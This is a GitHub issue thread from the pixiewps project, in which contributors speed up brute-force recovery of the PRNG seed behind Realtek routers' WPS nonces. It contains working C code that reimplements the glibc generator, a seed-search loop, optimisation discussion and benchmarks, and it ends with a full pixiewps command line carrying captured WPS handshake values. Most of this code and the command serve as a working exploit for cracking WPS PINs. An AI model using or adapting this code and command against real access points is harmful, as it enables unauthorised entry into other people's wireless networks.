Perfomance improvement for the realtek.

1yura commented 6 years ago

I found the way to improvement perfomance of the realtek prng.

static const uint32_t realtek_fast_table[3 + 31] = {0x128e83b, 0xdafa31, 0x9f4828, 0xf66443, 0xbee24d, 0x817005, 0xcb918f, 0xa64845, 0x69c3cf, 0xa76dbd, 0x90a848, 0x57025f, 0x89126c, 0x7d9a8f, 0x48252a, 0x6fb2d4, 0x6ccc15, 0x3c5744, 0x5a998f, 0x5df917, 0x32ed77, 0x492688, 0x50e901, 0x2b5f57, 0x3acd0b, 0x456b7a, 0x25413d, 0x2f11f4, 0x3b564d, 0x203f14, 0x2589fc, 0x3283f8, 0x1c17e4, 0x1dd823};

static inline void realtek_fast_produce_nonce(uint32_t seed, uint8_t *dest){ // convert seed to nonce, it is completly replaces srandom_r() and random_r() ; seed !=0
    uint32_t word0 = 0, word1 = 0, word2 = 0, word3 = 0;

    for (int j = 0; j < 31; j++) {
        word0 += seed * realtek_fast_table[j + 3];
        word1 += seed * realtek_fast_table[j + 2];
        word2 += seed * realtek_fast_table[j + 1];
        word3 += seed * realtek_fast_table[j + 0];
        seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);
    }
    word0 = htonl(word0 >> 1); memcpy(dest + 0,  &word0, 4);
    word0 = htonl(word1 >> 1); memcpy(dest + 4,  &word0, 4);
    word0 = htonl(word2 >> 1); memcpy(dest + 8,  &word0, 4);
    word0 = htonl(word3 >> 1); memcpy(dest + 12, &word0, 4);
}

static uint32_t realtek_fast_prepare_sample(uint8_t *nonce) { // get 1/4 part of the nonce for testing
    uint32_t res;
    memcpy(&res, nonce, sizeof(res));
    return ntohl(res);
}

static inline int realtek_fast_test_seed(uint32_t seed, uint32_t sample){ // testing 1/4 part of the nonce; if matched - there is a need to test a whole nonce; seed !=0
    uint32_t word0 = 0;

    for (int j = 0; j < 31; j++) {
        word0 += seed * realtek_fast_table[j + 3];
        seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);
    }
    word0 = word0 >> 1;
    return sample == word0 ? ret_ok : ret_fail;
}

and the example - how to use these functions:

uint32_t sample = realtek_fast_prepare_sample(wps->e_nonce);
int seed_found = 0;
for (uint32_t seed = 1; seed < 0xffffffff; seed++) {
    if (realtek_fast_test_seed(seed, sample) != ret_ok) {
        continue;
    }
    uint8_t test_nonce[WPS_NONCE_LEN];
    realtek_fast_produce_nonce(seed, test_nonce);
    if(memcmp(wps->e_nonce, test_nonce, WPS_NONCE_LEN) == 0) {
        seed_found = 1;
        break;
    }
}

It works 5 more times faster than the chain srandom_r() + random_r(). I do not tested it on big endian CPU.

Edit: added syntax coloring (wiire-a)

wiire-a commented 6 years ago

Thank you again for your contribution. I will test as soon as I have some spare time :)

The modulo operator is quite slow:

seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);

can be substituted with this (should be ~30% faster):

const uint64_t p = 16807ULL * seed;
const uint64_t m = (p >> 31) + (p & 0x7fffffff);
seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);

See glibc_random_lazy.c#L56.

1yura commented 6 years ago

I did not noticed then you replaced srandom_r () :)

wiire-a commented 6 years ago

Added the new code with (7738fda).

I simplified the code a bit, like removing the htonl() functions and the % 2147483647parts.

On my x86 machine it's about 60% faster, but my commit aimed for a quick and simple integration with the existing code. Some further testing and tweaking could be useful.

1yura commented 6 years ago

In the cycle for (int j = 0; j < 31; j++) last (when j == 30) calculation of seed is useless.

wiire-a commented 6 years ago

Yes. I think the code could be re-written this way:

static inline uint32_t glibc_fast_seed(uint32_t seed)
{
    uint32_t word0 = 0;

    for (int j = 3; j < 31 + 3 - 1; j++) {
        word0 += seed * glibc_seed_tbl[j];

        /* This does: seed = (16807LL * seed) % 0x7fffffff
           using the sum of digits method which works for mod N, base N+1 */
        const uint64_t p = 16807ULL * seed; // Seed is always positive (31 bits)
        seed = (p >> 31) + (p & 0x7fffffff);
    }
    return (word0 + seed * glibc_seed_tbl[33]) >> 1;
}

The variable seed is always positive thus the multiplication 16807ULL * seed is 63 bits or less and after the first shift (p >> 31) the top bits of p are always 0. So the second part:

/* The result might still not fit in 31 bits, if not, repeat
    (conditional seems to make it slightly faster) */
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;

is useless.

Maybe you can confirm me that.

BTW if you want come back to the IRC channel we can discuss these things there. I know that @rofl0r can be a bit annoying but bear with him ;)

wiire-a commented 6 years ago

Pushed the new changes (7acd739). On my laptop now the difference is much more noticeable compared to my old code: 4 times faster.

1yura commented 6 years ago

seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m; is useless. Maybe you can confirm me that.

Not confirm. For example with seed 5951 glibc_fast_seed() gets wrong result. I don know why. With seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m; - all ok.

1yura commented 6 years ago

A constantly working messenger distracts me. But when there is something to discuss - I will join. And about - can ralink_random() produce any value or not - it can, i checked :)

1yura commented 6 years ago

I found something interesting: seed = 0xfffffffe function with code seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647); produces correct nonce. But function with

        const uint64_t p = 16807ULL * seed;
        const uint64_t m = (p >> 31) + (p & 0x7fffffff);
        seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);

produces wrong nonce.

amiinebh commented 6 years ago

just tested this and the difference is noticeable , thank you @1yura for your contribution , just like the ralink optimization , the code now is way more faster , great work @wiire-a @1yura

1yura commented 6 years ago

Upd. Try this fast function: https://0x0.st/sNXM.c The output must be compared with the lower 7 bits of the first word(32 bit) nonce.

wiire-a commented 6 years ago

Will do soon.

At the time I added the conditional because it seemed to be faster that way. In this function however it seems to make it noticeably slower so I guess we should replace:

const uint64_t p = 16807ULL * seed;
const uint64_t m = (p >> 31) + (p & 0x7fffffff);
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;

with this:

uint64_t p = 16807ULL * seed;
p = (p >> 31) + (p & 0x7fffffff);
seed = (p >> 31) + (p & 0x7fffffff);

In the current code negative values are never tested since the seed corresponds always to the current time, it's always positive. So I wouldn't add the check with:

seed = (seed == 0x7fffffff || seed == 0xfffffffe) ? 0 : seed;

which only slows down the cracking process.

If the current time is not retrieved from the router, the value of 0 (Unix Epoch) is returned. But seed = 0 returns a value of 0. So internally the PRNG checks if seed = 0, if it is it changes it to 1, see glibc_random_old.c#L93:

/* We must make sure the seed is not 0. Take arbitrarily 1 in this case. */
if (seed == 0)
    seed = 1;

The value of 0x7ffffffff would be ok, but it represents 03:14:07 of January 19th 2038 (UTC). In practice it's never tested unless the user uses --end/start 02/2038. But honestly I wouldn't worry about it.

wiire-a commented 6 years ago

What's the purpose of doing:

REALTEK_FAST_SEED_STEP

over and over again, if the seed doesn't change?

1yura commented 6 years ago

It updates the seed :) # define REALTEK_FAST_SEED_STEP p = 16807ULL * seed; m = (p >> 31) + (p & 0x7fffffff); seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);

wiire-a commented 6 years ago

Old:

       2242.215146      task-clock (msec)         #    3.727 CPUs utilized          
               217      context-switches          #    0.097 K/sec                  
                 3      cpu-migrations            #    0.001 K/sec                  
               140      page-faults               #    0.062 K/sec                  
     5,116,201,317      cycles                    #    2.282 GHz                      (83.45%)
        64,305,319      stalled-cycles-frontend   #    1.26% frontend cycles idle     (83.54%)
     2,728,813,181      stalled-cycles-backend    #   53.34% backend cycles idle      (33.12%)
     8,297,312,960      instructions              #    1.62  insn per cycle         
                                                  #    0.33  stalled cycles per insn  (50.20%)
       556,638,317      branches                  #  248.254 M/sec                    (66.95%)
         4,441,275      branch-misses             #    0.80% of all branches          (83.47%)

       0.601541662 seconds time elapsed

New:

       2267.696976      task-clock (msec)         #    3.741 CPUs utilized          
               227      context-switches          #    0.100 K/sec                  
                 2      cpu-migrations            #    0.001 K/sec                  
               141      page-faults               #    0.062 K/sec                  
     5,179,056,557      cycles                    #    2.284 GHz                      (83.62%)
        17,023,000      stalled-cycles-frontend   #    0.33% frontend cycles idle     (83.18%)
     3,291,806,179      stalled-cycles-backend    #   63.56% backend cycles idle      (33.36%)
     6,936,919,663      instructions              #    1.34  insn per cycle         
                                                  #    0.47  stalled cycles per insn  (51.10%)
        80,430,879      branches                  #   35.468 M/sec                    (67.60%)
           320,102      branch-misses             #    0.40% of all branches          (83.81%)

       0.606194954 seconds time elapsed

It doesn't really change anything for me. Even if you unroll or remove the for loop, the instructions are still executed sequentially since one depends on the other.

For example:

REALTEK_FAST_SEED_STEP
b += realtek_fast_lookup_4d[(uint8_t)seed]; /* This must wait operation above to finish (since seed is shared) */

REALTEK_FAST_SEED_STEP                      /* This must wait operation above to finish (since seed is shared) */
b += realtek_fast_lookup_5[(uint8_t)seed];  /* This must wait operation above to finish (since seed is shared) */

If instead we'd have something like:

for (...) {
    // ...
    independent_operation_A();
    independent_operation_B();
    // ...
}

those 2 would execute in parallel if they wouldn't share the same variables (seed in our case).

Also the most expensive operation is the modulo (%) or its variant in REALTEK_FAST_SEED_STEP, a precomputed table maybe should aim at avoiding or reducing that.

wiire-a commented 6 years ago

I pushed the changes to fix my previous commit so we have the same starting point to judge optimizations and modifications.

Maybe another consideration that could be useful is the fact that we test the seeds in sequence:

seed
seed + 1
seed + 2
...

or, backwards

seed
seed - 1
seed - 2
...

Not sure if this helps, but if it would we could setup some intermediate table(s), eg: initstate_table(seed).

I'm just throwing out ideas. I'm still not sure I understand what you did with your changes :)

1yura commented 6 years ago

I have no more ideas. It should be noted that the conversion of nonce -> seed is always fixed, therefore, those who are important speed can use the lookup tables. The full table is 16GB, the optimized one is 8GB. Or rainbow tables.

wiire-a commented 6 years ago

We've come a log way. A simple benchmark over a 3 years period (--start 2017 --end 2014) on my laptop:

version	-j 1	-j 4	PRNG
1.3.0	108 s 362 ms	-	old
pre-1.4.0	76 s 534 ms	29 s 818 ms	old optimized
1.4.1	27 s 105 ms	9 s 221 ms	lazy
git	8 s 909 ms	3 s 109 ms	yura

Obviously the difference is less noticeable on a faster machine (e.g. my Desktop).

There will be a new release soon. Thank you :)

Data used:

./pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 89:90:3d:aa:c7:52:5a:3e:33:c5:b8:33:a3:1d:bf:a5:3c:95:d4:d4:6f:4c:1b:f5:3f:9b:e8:77:47:d8:72:7b:a9:46:85:f6:83:4b:6a:11:d0:6d:1d:5b:5f:af:70:32:02:4e:f9:d7:5c:bb:45:d8:03:eb:b2:ea:5d:c7:b2:a8:05:9d:f3:7e:93:be:97:c4:d6:60:11:cc:fc:9a:d3:21:f3:b9:4b:5b:79:ae:5d:31:66:3d:7c:41:42:31:df:5a:62:64:70:97:ae:7a:7a:57:43:13:71:01:cc:80:df:c0:7d:45:2e:e6:5d:92:8f:22:28:6c:53:f6:4f:5e:f8:aa:bf:21:4b:c6:9e:37:74:86:37:f2:07:6b:26:b9:7a:6f:50:86:6e:2a:80:3a:5a:e4:0f:d3:9e:50:12:4e:86:38:05:38:c6:34:1a:b7:8a:8a:13:f9:19:f9:61:c0:75:b7:2c:9a:1d:21:d5:5c:14:e7:50:94:c8:53:a8:4d:0f:06 -s d1:61:6f:47:df:93:d1:94:80:ec:a1:23:3c:7b:0b:1e:7a:b7:c4:09:a8:b8:20:87:cb:26:89:d4:d5:34:e3:21 -z 11:58:69:bd:7c:9d:3a:8c:18:e9:b1:04:bc:2e:85:a2:39:fb:12:cd:b3:a0:a5:c5:95:88:08:1d:fb:d7:92:a7 -a 77:e6:24:e3:4f:d1:8e:57:48:a2:88:de:ee:88:0e:14:bc:8e:9e:c8:4b:eb:14:ec:9e:8b:cb:d5:d6:6d:79:97 -n 4b:86:6f:2e:76:49:21:ce:56:c2:93:63:3c:b5:a0:b5

wiire-a / pixiewps

Perfomance improvement for the realtek. #88